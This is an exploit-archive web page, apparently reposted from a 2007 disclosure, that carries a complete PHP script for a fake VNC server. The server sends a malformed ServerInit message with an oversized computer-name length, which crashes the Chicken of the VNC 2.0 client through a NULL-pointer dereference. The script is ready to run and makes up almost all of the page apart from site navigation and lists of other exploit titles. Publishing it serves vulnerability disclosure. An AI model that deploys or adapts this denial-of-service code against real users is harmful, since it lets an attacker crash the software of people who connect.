首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Chicken of the VNC 2.0 (NULL-pointer) Remote Denial of Service Exploit 来源：poplix [@] papuasia.org 作者：poplix 发布时间：2007-02-05   <? $port = "5900"; $BadServerInit= "\x04\x00".                                     // fb-width "\x03\x00".                                     // fb-hight "\x20".                                         // bits per pixel "\x18".                                         // depth "\x00".                                         // big-endian flag "\x01".                                         // true-color flag "\x00\xff\x00\xff\x00\xff". // r-g-b max "\x10\x08\x00".                         // r-g-b shift "\x00\x00\x00".                         // padding "\xff\xff\xff\xff".                     // computer-name size "DIE_PLZ";                                      // computer-name $ser = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); socket_set_option($ser,SOL_SOCKET,SO_REUSEADDR,1); socket_bind($ser,"0.0.0.0", $port); socket_listen($ser, 5); print "this fake vnc server will crash cotv2.0 (http://sourceforge.net/projects/cotvnc/) due to a NULL-pointer dereference 02-02-2007   poplix [@] papuasia.org listening on $port ...\n"; $cotv = socket_accept($ser); print "client connected\n"; socket_write($cotv, "RFB 00 3.008\n"); while($i=socket_read($cotv, 1024))        if(substr($i,0,6) == "RFB 00") break; print "protocol has been negotiated\n"; socket_write($cotv, "\x00\x00\x00\x01"); while($i=socket_read($cotv, 1024))        if(ord($i[0])==0 || ord($i[0])==1)break; print "sending expl...\n"; socket_write($cotv, $BadServerInit); socket_close($cotv); socket_close($ser); print "done\n"; ?>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·phpBB ezBoard converter 0.2 (e ·phpBB++ Build 100 (phpbb_root_ ·Woltlab Burning Board Lite <= ·Imail 8.10-8.12 (RCPT TO) Remo ·Imail 8.10-8.12 (RCPT TO) Remo ·CA BrightStor ARCserve 11.5.2. ·CA BrightStor ARCserve (lgserv ·Categories hierarchy phpBB Mod ·GGCMS <= 1.1.0 RC1 Remote Code ·Extcalendar <= 2 (profile.php) ·MS Internet Explorer 6 (mshtml ·Oracle 9i/10g DBMS_EXPORT_EXTE   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved